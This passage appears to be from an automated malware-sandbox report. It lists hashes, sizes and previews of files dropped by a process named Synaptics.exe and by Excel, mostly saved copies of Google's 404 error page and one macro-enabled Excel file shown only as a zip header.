                                                                                                                            Entropy (8bit):5.26910086553741
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0pbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+e+pAZewRDK4mW
                                                                                                                            MD5:3446D63EF87F732FC8A8155F415FB544
                                                                                                                            SHA1:E54F05E22C2471BA42FA28F12BF488BBF58DE94B
                                                                                                                            SHA-256:B9141E418782B98189A708B94365E32A9890EAC52C5403EA143B3E7EE6972794
                                                                                                                            SHA-512:943B273F9FBC30E6B03EAAE39733C5BC8415FBB8461A310B324EF2016842A5ADD6A733FE3A40802D3F23F6B3C985409C9AB689993F0C328A116A314856420781
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rMaDVfHPYAlNc5JLD3hUug">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\lvfMqad.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.265546272687268
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0PSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8+pAZewRDK4mW
                                                                                                                            MD5:E9B9773BB9A4FC7AB350B5FB9F8A2F2C
                                                                                                                            SHA1:C9D90A9C619BB0800A63DBC4DCF1D24834266592
                                                                                                                            SHA-256:2893BE7EEE2B662313743B1FE2A6E25B8A6406E14F55511391F492B5662F5035
                                                                                                                            SHA-512:B9FBF4CC8BBBE8522A5E1C0C8375848AF0BE3748B88BE5D232CDFC718CAE737F44EEF580D8280D889B03D166A43C50E5A7FC70241A8099E1D7C34B8756BF4784
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="H_mkXCRF2icL30ZXr1PAtA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\oJIRyvL.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.259734951156232
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0i9QSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+H9Q+pAZewRDK4mW
                                                                                                                            MD5:D637DDFDA11F306AC97EE6BD7532C593
                                                                                                                            SHA1:C98ED0F0F96D9FF8EFE764B88DCDB31DDD0E27E3
                                                                                                                            SHA-256:7E182AB185794C92A129EB191A3078E500B644F7B345888F17EA4AF338073141
                                                                                                                            SHA-512:D43E14310C744F69A3D050EEB424DDBC9DDA2EB645F46F9008F3B9795143C406491EEF517BE465A944F834FB4B699BAD7CB05662B8B44FE68CFCBC5A298863A9
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="H3htGdFrBelsZErG9QOfBw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\pVF2vUA.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.258300501888746
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0jSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8+pAZewRDK4mW
                                                                                                                            MD5:77FDB493332401303B95D5D60035B5D7
                                                                                                                            SHA1:590DE2626E90B187B7CF03954CA8044C09C4E489
                                                                                                                            SHA-256:0C873BEC619C6901E7EABCDD28EEC68C070B8A9FF74144808ED9C5DB1C594E50
                                                                                                                            SHA-512:CC431691A791FE0D9846234C53F77636289376713A9377149F4A1BAC4956CFDABEBF8DD4AC0D7CCD0E6F60D7A2F64141356B21FEF486F07F8103772011820E71
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BgNECeN5obE-Ibnjf3qzTw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\qPFul5O.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.263271050594209
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0erSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+/+pAZewRDK4mW
                                                                                                                            MD5:7672BEF9C89F5731824EAE5297CA2EE2
                                                                                                                            SHA1:AEBD382220E0888767B7DBCB9C5665320B3A0289
                                                                                                                            SHA-256:A9F2421BC4D794AD6DF388C8BBFD52D9D6BEDB8061ECFB01BF3471A0F59CBD34
                                                                                                                            SHA-512:5986240F92FB342300CF9DFF41112E32EBE83E11BB153E44F820EC0AABFB843BC77B98CA4E5D67684B76DF5D5F644C9C49F5D1D9D5071C3BBB471AF7CF43CA01
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ywjIwDfIrHgzd31nZ-4qBA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\rtXKjD4.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.270323823576069
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0FSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+O+pAZewRDK4mW
                                                                                                                            MD5:396C58C0C2EC091774409CCB4DD38BB2
                                                                                                                            SHA1:3C570D3B64B677623EB516ECF09AEC8761C108AD
                                                                                                                            SHA-256:81D850DECC07998778D1AE8D63E6183A830D3264D4BAD603A95F95CBC58F7D38
                                                                                                                            SHA-512:A1FBF2ACC9F135C9E54E75224E2FFE9DD3C0E6A05225A9BF700B2945EFC0F3F34DB333CAF43366FA1F7049265835CFE7C0C03C1326A22E093B435E06D1F050DC
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="B79XDfONh3BAhXgXTIN2pw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\trAYwk6.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.262364068947809
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0vSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+k+pAZewRDK4mW
                                                                                                                            MD5:2B0C8989BABA23DC20529A605989E77A
                                                                                                                            SHA1:DD407A905E410C938A2E2C51CFCC12AFDB54FA13
                                                                                                                            SHA-256:C84DDD76C7B5B53F18A2D83B8DF32B112C4B4054D6E98111E581141FD1DC8ABD
                                                                                                                            SHA-512:189A25FBDA51A05A4F93208BBB8213677AA8B2B1148741FDF737877AB75A9DF939BF64866769564AF41C8E25B85FFFBDB45AC38A201EE0BDBFB2130F22AAB2CD
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vsFMBEmgX7q-4dgjN0NBDw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\tzwZD1O.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.254870238836608
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0aSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+F+pAZewRDK4mW
                                                                                                                            MD5:C8FDC106006E8AD28B4E5EC36716D488
                                                                                                                            SHA1:74D3F810E413C2B688656BF07D45EBBA4055EC3F
                                                                                                                            SHA-256:7248526BCFB1A5AC72A3FC5E83C066E5C642DA3E079A0DFC0C4B3BD4A1E202F7
                                                                                                                            SHA-512:8A8F828CCF8E1ABA4C3C18A7A8A5D5C984419DFECE945EB28CC6E2D41635B8E961B82A21467A7C71A596031F0F48E912235A736DF081AA1C4FA621234B1E8C15
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ppjEqcF41g29Jc6Mtnr9Yg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\wZuLLQW.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.255566478466841
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+007cSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+ZA+pAZewRDK4mW
                                                                                                                            MD5:F73CCD95F1A1BBE7CB6874C77CD33195
                                                                                                                            SHA1:B928B3686AC6A710C4993BACBB9BEC83C344D83B
                                                                                                                            SHA-256:8C2277A1174E0548A22220ACDC881542EC23367850095A8F94CA3BAD48F908F2
                                                                                                                            SHA-512:D5CFADB3BCFD29F9A6C8E6F5B99EB1639BB9A623D7754C64669E2FC26118047CFFBC85075CE48E7A5E1B45D316372B88F38515164AC3C1826D8C6EE6334446F4
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_m4LaJJb3gG8FYp2DwdilA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\xehXRFJ.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.253159613315239
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0fSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Y+pAZewRDK4mW
                                                                                                                            MD5:E161F8B4000DAB86EC6E1EB899BD7D7B
                                                                                                                            SHA1:E585A9FCE67A038FE2FAE14FB38E1A21EDAC468A
                                                                                                                            SHA-256:A6B91C539C33450BADA2F77F84F4F401D51882FF6FCA06B0C4E2E8CCD92B459F
                                                                                                                            SHA-512:9C20F2955B039F407940E7E2BDE7E30A95B4DE04F090E4B93B41D485BB3A67169FE96D8708D3A66C99628925D6602564F7E6C2B2A8C7F4E3EF2A52E0C0A3950C
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="aw10eJFpEOeUJrgNzY1d2Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\xqbgRAW.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.255049936975737
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0/SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+M+pAZewRDK4mW
                                                                                                                            MD5:026A6845AAB6034478AECA1768F438B5
                                                                                                                            SHA1:0F37590CA97CDBBEE91D69FA92142A023214DDB1
                                                                                                                            SHA-256:FBC2B775D3CB980FA559CF7D4D77A63DDC0674A9E4F199816591A875A7F48BDB
                                                                                                                            SHA-512:95CC8BDB8AA51669CB17E5D2668969B7643C960199805C844E3603FAF5FC75E633364FF7EB863F966427FF25448240A0C2BFA64619169B5D09511ED9968730B6
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kR5ArOnVcS21tSut1VomUQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\yVnYVh7.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.2662066206828895
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0WSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+J+pAZewRDK4mW
                                                                                                                            MD5:639BF8C58EB31C7D1CF87D7989FF0C0E
                                                                                                                            SHA1:3BFB684CAC156CD9D06C373F7B0DB265A1579EC7
                                                                                                                            SHA-256:4FCEDEFACE7CC3BC0E95F922A7DFCE89F55E1A6A9F05A7ADC186D055A692D52C
                                                                                                                            SHA-512:D7E97FE00A4F556DAE017C059EA833B95D8EA01B316F6C19D867E7DB7159581126CAC3FF3AC4EFB84B4C5A25D8BDEED0C4D1005DA2F9F88AC53496659DF844D6
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qdUBf712KZAEjESeefeUyA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\z8JTffO.ini

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.269245667933756
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0a/SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+/+pAZewRDK4mW
                                                                                                                            MD5:13441856A277B84ABCE3B72930E7E7B0
                                                                                                                            SHA1:87D6E728D4B4838AEDB9DF8EA4660D5CA4925817
                                                                                                                            SHA-256:5C86AFF75F12CA38AF3FBA949772AEA59B6620D565BE11389653527F0D99B34F
                                                                                                                            SHA-512:0242FC661E9228B210022D1ECA58DC7B9FE8E0131FC22755B46824FD2B178362A32A283A06E83530C9E360211F4AF390C052BB8C15950778CC4365DEF4F54EAF
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AQ7wHAvlS88kkYbzOeXwZw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                            C:\Users\user\AppData\Local\Temp\zuYOpErC.xlsm

                                                                                                                            Download File
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:Microsoft Excel 2007+
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):18387
                                                                                                                            Entropy (8bit):7.523057953697544
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                            MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                            SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                            SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                            SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                            C:\Users\user\AppData\Local\Temp\~$zuYOpErC.xlsm

                                                                                                                            Download File
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):165
                                                                                                                            Entropy (8bit):1.4377382811115937
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:KVC+cAmltV:KVC+cR
                                                                                                                            MD5:9C7132B2A8CABF27097749F4D8447635
                                                                                                                            SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                                                                                            SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                                                                                            SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                                                                                            Malicious:false
                                                                                                                            Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF4E7A4A6DD4BF6C73.TMP

                                                                                                                            Download File
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):32768
                                                                                                                            Entropy (8bit):3.746897789531007
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                            MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                            SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                            SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
